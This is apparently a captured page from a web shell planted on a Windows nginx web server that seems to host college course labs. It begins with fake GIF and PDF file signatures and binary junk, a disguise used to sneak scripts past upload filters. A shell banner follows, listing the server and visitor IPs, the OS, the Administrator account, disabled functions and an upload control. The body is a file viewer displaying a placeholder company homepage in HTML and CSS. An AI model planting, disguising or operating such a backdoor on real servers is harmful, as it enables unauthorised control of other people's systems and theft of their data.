GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/Classes/CST2276 Windows Server Advanced Services/Labs/ |
Upload File : |
<!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Company Name</title> <style> /* Add your CSS styles here */ body { font-family: Arial, sans-serif; } header { background-color: #333; color: #fff; display: flex; justify-content: space-between; padding: 1rem; } header h1 { margin: 0; } header nav { display: flex; } header nav a { color: #fff; margin-left: 1rem; text-decoration: none; } .container { max-width: 1200px; margin: 2rem auto; text-align: center; } .hero { background-image: url('./hero-bg.jpg'); background-size: cover; height: 400px; display: flex; align-items: center; justify-content: center; } .hero h2 { color: #fff; font-size: 3rem; margin: 0; text-shadow: 1px 1px #000; } .services { background-color: #f7f7f7; padding: 2rem; display: flex; flex-wrap: wrap; justify-content: center; } .service { background-color: #fff; box-shadow: 1px 1px #ccc; border-radius: 10px; width: 300px; height: 200px; display: flex; align-items: center; justify-content: center; margin: 1rem; } .service h3 { margin: 0; } footer { background-color: #333; color: #fff; display: flex; justify-content: center; padding: 1rem; } footer p { margin: 0; } </style> </head> <body> <header> <h1>Company Name</h1> <nav> <a href="#">Home</a> <a href="#services">Services</a> <a href="#about">About</a> <a href="#contact">Contact</a> </nav> </header> <div class="container"> <section class="hero"> <h2>Welcome to Company Name</h2> </section> <section id="services" class="services"> <div class="service"> <h3>Service 1</h3> </div> <div class="service"> <h3>Service 2</h3> </div> <div class="service"> <h3>Service 3</h3> </div> </div> </body> </html>